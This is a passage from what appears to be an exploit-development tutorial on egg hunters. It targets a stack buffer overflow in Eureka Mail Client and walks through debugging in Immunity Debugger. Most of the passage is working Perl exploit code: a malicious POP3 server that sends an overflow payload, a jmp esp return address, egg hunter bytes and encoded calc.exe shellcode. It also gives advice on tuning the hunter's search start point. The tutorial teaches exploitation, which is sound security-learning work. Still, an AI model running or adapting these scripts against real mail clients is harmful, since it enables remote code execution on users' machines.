#8b0000;\">\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk.$ret.$padding.$shellcode;\n\n#set up listener on port 110\n<span style=\"color: 
#0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp port 110 [POP3]... \\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p>Attach Immunity to Eureka, and set a breakpoint at 0x7E47B533 (jmp edi).<\/p>\n<p>Trigger the exploit. Immunity breaks at jmp edi. When we look at the registers now, instead of finding our shellcode at EDI, we see A\u2019s. 
That\u2019s not what we expected, but it\u2019s still ok, because we control the A\u2019s.\u00a0 This scenario, however, would be more or less the same as when using jmp esp : we would only have about 700 bytes of space. (Alternatively, of course, you could use nops instead of A\u2019s, and write a short jump just before RET is overwritten. Then place the shellcode directly after the overwritten RET and it should work too.)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image13.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb13.png\" alt=\"image\" width=\"510\" height=\"313\" border=\"0\" \/><\/a><\/p>\n<p>But let\u2019s do it the \u201chard\u201d way this time, just to demonstrate that it works.\u00a0 Even though we see A\u2019s where we may have expected to see shellcode, our shellcode is still placed somewhere in memory. 
If we look a little bit further, we can see our shellcode at 0x00473992 :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image12.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb12.png\" alt=\"image\" width=\"396\" height=\"145\" border=\"0\" \/><\/a><\/p>\n<p>This address may not be static\u2026 so let\u2019s make the exploit more dynamic and use an egg hunter to find and execute the shellcode.<\/p>\n<p>We\u2019ll use an initial jmp to esp (because esp is only 714 bytes away), put our egg hunter at esp, then write some padding, and then place our real shellcode (prepended with the marker)\u2026 Then no matter where our shellcode is placed, the egg hunter should find &amp; execute it.<\/p>\n<p>The egg hunter code (I\u2019m using the NtAccessCheckAndAuditAlarm method in this example) looks like this :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">my<\/span> $egghunter =\n\"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x77\\x30\\x30\\x74<\/span>\". 
# this is the marker\/tag: w00t\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";<\/pre>\n<p>The tag used in this example is the string w00t.\u00a0 This 32 byte shellcode will search memory for \u201cw00tw00t\u201d and execute the code just behind it.\u00a0 This is the code that needs to be placed at esp.<\/p>\n<p>When we write our shellcode in the payload, we need to prepend it with w00tw00t (= 2 times the tag - after all, just looking for a single instance of the egg would probably result in finding the second part of egg hunter itself, and not the shellcode)<\/p>\n<p>First, locate jump esp (!pvefindaddr j esp). I\u2019ll use 0x7E47BCAF (jmp esp) from user32.dll (XP SP3).<\/p>\n<p>Change the exploit script so the payload does this :<\/p>\n<p>- overwrite EIP after 710 bytes with jmp esp<\/p>\n<p>- put the $egghunter at ESP.\u00a0 The egghunter will look for \u201cw00tw00t\u201d<\/p>\n<p>- add some padding (could be anything\u2026 nops, A\u2019s\u2026 as long as you don\u2019t use w00t \ud83d\ude42 )<\/p>\n<p>- prepend \u201cw00tw00t\u201d before the real shellcode<\/p>\n<p>- write the real shellcode<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><span style=\"color: #0000ff;\">use<\/span> Socket;\n#fill out the <span style=\"color: #0000ff;\">local<\/span> IP or hostname\n#which is used by Eureka EMail as <span style=\"color: #0000ff;\">POP<\/span>3 server\n#note : must be exact match !\n\n<span style=\"color: #0000ff;\">my<\/span> $localserver = \"<span style=\"color: #8b0000;\">192.168.0.193<\/span>\";\n#calculate <span style=\"color: #0000ff;\">offset<\/span> to EIP\n<span style=\"color: #0000ff;\">my<\/span> $junk = \"<span style=\"color: #8b0000;\">A<\/span>\" x (723 - <span style=\"color: #0000ff;\">length<\/span>($localserver));\n<span style=\"color: #0000ff;\">my<\/span> $ret=<span style=\"color: 
#0000ff;\">pack<\/span>('V',0x7E47BCAF); #jmp esp from user32.dll\n<span style=\"color: #0000ff;\">my<\/span> $padding = \"<span style=\"color: #8b0000;\">\\x90<\/span>\" x 1000;\n<span style=\"color: #0000ff;\">my<\/span> $egghunter = \"<span style=\"color: #8b0000;\">\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"<span style=\"color: #8b0000;\">\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t\n\"<span style=\"color: #8b0000;\">\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\n\n#calc.exe\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"<span style=\"color: 
#8b0000;\">\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\n<span style=\"color: #0000ff;\">my<\/span> $payload=$junk.$ret.$egghunter.$padding.\"<span style=\"color: #8b0000;\">w00tw00t<\/span>\".$shellcode;\n\n#set up listener on port 110\n<span style=\"color: #0000ff;\">my<\/span> $port=110;\n<span style=\"color: #0000ff;\">my<\/span> $proto=<span style=\"color: #0000ff;\">getprotobyname<\/span>('tcp');\n<span style=\"color: #0000ff;\">socket<\/span>(SERVER,PF_INET,SOCK_STREAM,$proto);\n<span style=\"color: #0000ff;\">my<\/span> $paddr=sockaddr_in($port,INADDR_ANY);\n<span style=\"color: #0000ff;\">bind<\/span>(SERVER,$paddr);\n<span style=\"color: #0000ff;\">listen<\/span>(SERVER,SOMAXCONN);\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Listening on tcp 
port 110 [POP3]... \\n<\/span>\";\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Configure Eureka Mail Client to connect to this host\\n<\/span>\";\n<span style=\"color: #0000ff;\">my<\/span> $client_addr;\nwhile($client_addr=<span style=\"color: #0000ff;\">accept<\/span>(CLIENT,SERVER))\n{\n  <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Client connected, sending evil payload\\n<\/span>\";\n  while(1)\n  {\n     <span style=\"color: #0000ff;\">print<\/span> CLIENT \"<span style=\"color: #8b0000;\">-ERR <\/span>\".$payload.\"<span style=\"color: #8b0000;\">\\n<\/span>\";\n\t <span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\"> -&gt; Sent <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($payload).\"<span style=\"color: #8b0000;\"> bytes\\n<\/span>\";\n  }\n}\n<span style=\"color: #0000ff;\">close<\/span> CLIENT;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">[+] Connection closed\\n<\/span>\";<\/pre>\n<p>&nbsp;<\/p>\n<p>Attach Immunity to Eureka Mail, and set a breakpoint at 0x7E47BCAF. Continue to run Eureka Email.<\/p>\n<p>Trigger the exploit. 
Immunity will break at the jmp esp breakpoint.<\/p>\n<p>Now look at esp (before the jump is made) :<\/p>\n<p>We can see our egghunter at 0x0012cd6c<\/p>\n<p>At 0x12cd7d (mov eax,74303077), we find our string w00t.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image14.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb14.png\" alt=\"image\" width=\"632\" height=\"253\" border=\"0\" \/><\/a><\/p>\n<p>Continue to run the application, and calc.exe should pop up<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image15.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb15.png\" alt=\"image\" width=\"202\" height=\"129\" border=\"0\" \/><\/a><\/p>\n<p>Nice.<\/p>\n<p>As a little exercise, let\u2019s try to figure out where exactly the shellcode was located in memory when it got executed.<\/p>\n<p>Put a break between the 2 eggs and the shellcode (so prepend the shellcode with 0xCC), and run the exploit again (attached to the debugger)<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image26.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb26.png\" alt=\"image\" width=\"631\" height=\"277\" border=\"0\" \/><\/a><\/p>\n<p>The egg+shellcode was found in the resources section of the application.<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image27.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 
0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb27.png\" alt=\"image\" width=\"675\" height=\"71\" border=\"0\" \/><\/a><\/p>\n<p>So it looks like the egghunter (at 0x0012cd6c) had to search memory until it reached 0x004739AD.<\/p>\n<p>If we look back (put breakpoint at jmp esp) and look at stack,we see this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image31.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb31.png\" alt=\"image\" width=\"290\" height=\"235\" border=\"0\" \/><\/a><\/p>\n<p>Despite the fact that the shellcode was not located anywhere near the hunter, It did not take a very long time before the egg hunter could locate the eggs and execute the shellcode.\u00a0 Cool !<\/p>\n<p>But what if the shellcode is on the heap ? How can we find all instances of the shellcode in memory? What if it takes a long time before the shellcode is found ? What if we must tweak the hunter so it would start searching in a particular place in memory ? And is there a way to change the place where the egg hunter will start the search ?\u00a0 A lot of questions, so let\u2019s continue.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<h3>Tweaking the egg hunter start position (for fun, speed and reliability)<\/h3>\n<p>When the egg hunter in our example starts executing, it will perform the following instructions :<\/p>\n<p><em>(Let\u2019s pretend that EDX points to 0x0012E468 at this point, and the egg sits at 0x0012f555 or so. 
)<\/em><\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"><strong><span style=\"color: #ff0000;\">0012F460   66:81CA FF0F     OR DX,0FFF\n0012F465   42               INC EDX<\/span><\/strong>\n0012F466   52               <span style=\"color: #0000ff;\">PUSH<\/span> EDX\n0012F467   6A 02            <span style=\"color: #0000ff;\">PUSH<\/span> 2\n0012F469   58               <span style=\"color: #0000ff;\">POP<\/span> EAX<\/pre>\n<p>The first instruction will put 0x0012FFFF into EDX. The next instruction (INC EDX) increments EDX by 1, so EDX now points at 0x00130000. This is the end of the current stack frame, so the search does not even start in a location where it would potentially find a copy of the shellcode in the same stack frame. (Ok, there is no copy of the shellcode in that location in our example, but it could have been the case).\u00a0 The egg+shellcode are somewhere in memory, and the egg hunter will eventually find the egg+shellcode. No problems there.<\/p>\n<p>If the shellcode could only be found on the current stack frame (which would be rare - but hey, can happen), then it may not be possible to find the shellcode using this egg hunter (because the hunter would start searching *after* the shellcode\u2026)\u00a0 Obviously, if you can execute some lines of code, and the shellcode is on the stack as well, it may be easier to jump to the shellcode directly by using a near or far jump with an offset\u2026\u00a0\u00a0 But it may not be reliable to do so.<\/p>\n<p>Anyways, there could be a case where you would need to tweak the egg hunter a bit so it starts looking in the right place (by positioning itself before the eggs and as close as possible to the eggs, and then executing the search loop).<\/p>\n<p>Do some debugging and you\u2019ll see. 
(watch the EDI register when the egghunter runs and you\u2019ll see where it starts).\u00a0 If modifying the egg hunter is required, then it may be worthwhile playing with the first instruction of the egg hunter a little.\u00a0 Replacing FF0F with 00 00 will allow you to search the current stack frame if that is required\u2026\u00a0 Of course, this one would contain null bytes and you would have to deal with that.\u00a0\u00a0 If that is a problem,\u00a0 you may need to be a little creative.<\/p>\n<p>There may be other ways to position yourself closer, by replacing 0x66,0x81,0xca,0xff,0x0f with some other instructions (depending on your requirements). Some examples :<\/p>\n<p>- find the beginning of the current stack frame and put that value in EDI<\/p>\n<p>- move the contents of another register into EDI<\/p>\n<p>- find the beginning of the heap and put that value in EDI (in fact, get PEB at TEB+0x30 and then get all process heaps at PEB+0x90). Check <a href=\"http:\/\/r00tin.blogspot.com\/2009\/03\/heap-only-egg-hunter.html\" target=\"_blank\" rel=\"noopener\">this document<\/a> for more info on building a heap only egg hunter<\/p>\n<p>- find the image base address and put it in EDI<\/p>\n<p>- put a custom value in EDI (dangerous - that would be like hardcoding an address, so make sure whatever you put in EDI is located BEFORE the eggs+shellcode).\u00a0\u00a0 You could look at the other registers at the moment the egghunter code would run and see if one of the registers could be placed in EDI to make the hunter start closer to the egg. 
Alternatively see what is in ESP (perhaps a couple of pop edi instructions may put something useful in EDI)<\/p>\n<p>- etc<\/p>\n<p>Of course, tweaking the start location is only advised if<\/p>\n<p>- speed really is an issue<\/p>\n<p>- the exploit does not work otherwise<\/p>\n<p>- you can perform the change in a generic way or if this is a custom exploit that needs to work only once.<\/p>\n<p>Anyways, I just wanted to mention that you should be a little creative in order to make a better exploit, a faster exploit, a smaller exploit, etc.<\/p>\n<p>&nbsp;<\/p>\n<h4>Hey, the egg hunter works fine in most cases ! Why would I ever need to change the start address ?<\/h4>\n<p>Ok - good question<\/p>\n<p>There may be a case where the final shellcode (tag+shellcode) is located in multiple places in memory, and some of these copies are corrupted\/truncated\/\u2026\u00a0 ( <em>= They set us up the bomb <\/em>) In this particular scenario, there may be good reason to reposition the egg hunter search start location so it would try to avoid corrupted copies. (After all, the egg hunter only looks at the 8 byte tag and not at the rest of the shellcode behind it)<\/p>\n<p>A good way of finding out if your shellcode<\/p>\n<p>- is somewhere in memory (and where it is)<\/p>\n<p>- is corrupt or not<\/p>\n<p>is by using the \u201c!pvefindaddr compare\u201d functionality, which was added in version 1.16 of the plugin.<\/p>\n<p>This feature was really added to compare shellcode in memory with shellcode in a file, but it will dynamically search for all instances of the shellcode. 
So you can see where your shellcode is found, and whether the code in a given location was modified\/cut off in memory or not.\u00a0\u00a0 Using that information, you can make a decision whether you should tweak the egg hunter start position or not, and if you have to change it, where you need to change it into.<\/p>\n<p>A little demo on how to compare shellcode\u00a0 :<\/p>\n<p>First, you need to write your shellcode to a file.\u00a0 You can use a little script like this to write the shellcode to a file :<\/p>\n<pre style=\"background-color: #f0f0f0; min-height: 40px; width: 650px; overflow: auto; border: #cecece 1px solid; padding: 5px;\"># <span style=\"color: #0000ff;\">write<\/span> shellcode for calc.exe to file called code.bin\n# you can - of course - prepend this with egghunter tag\n# <span style=\"color: #0000ff;\">if<\/span> you want\n#\n<span style=\"color: #0000ff;\">my<\/span> $shellcode=\"<span style=\"color: #8b0000;\">\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"<span style=\"color: 
#8b0000;\">\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"<span style=\"color: #8b0000;\">\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\n<span style=\"color: #0000ff;\">open<\/span>(FILE,\"<span style=\"color: #8b0000;\">&gt;code.bin<\/span>\");\n<span style=\"color: #0000ff;\">print<\/span> FILE $shellcode;\n<span style=\"color: #0000ff;\">print<\/span> \"<span style=\"color: #8b0000;\">Wrote <\/span>\".<span style=\"color: #0000ff;\">length<\/span>($shellcode).\"<span style=\"color: #8b0000;\"> bytes to file code.bin\\n<\/span>\";\n<span style=\"color: #0000ff;\">close<\/span>(FILE);<\/pre>\n<p>(We\u2019ll assume you have written the file 
into c:\\tmp. Note that in this example, I did not prepend the shellcode with w00tw00t, because this technique really is not limited to egg hunters. Of course, if you want to prepend it with w00tw00t - be my guest)<\/p>\n<p>Next, attach Immunity Debugger to the application, put a breakpoint before the shellcode would get executed, and then trigger the exploit.<\/p>\n<p>Now run the following PyCommand :\u00a0 !pvefindaddr compare c:\\tmp\\code.bin<\/p>\n<p>The script will open the file, take the first 8 bytes, and search memory for each location that contains these 8 bytes. Then, at each location, it will compare the shellcode in memory with the original code in the file.<\/p>\n<p>If the shellcode is unmodified, you\u2019ll see something like this :<\/p>\n<p><a href=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image33.png\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" style=\"display: inline; border-width: 0px;\" title=\"image\" src=\"https:\/\/www.corelan.be\/wp-content\/uploads\/2010\/01\/image_thumb33.png\" alt=\"image\" width=\"497\" height=\"260\" border=\"0\" \/><\/a><\/p>\n<p>If the shellcode is different (I have replaced some bytes with something else, just for testing purposes), you\u2019ll get something like this :<\/p>\n<p>- for each unmatched byte, you\u2019ll get an entry in the log, indicating the position in the shellcode, the original value (= what is found in the file at that position), and the value found in memory (so you can use this to build a list of bad chars, or to determine that - for example - shellcode was converted to uppercase or lowercase\u2026 
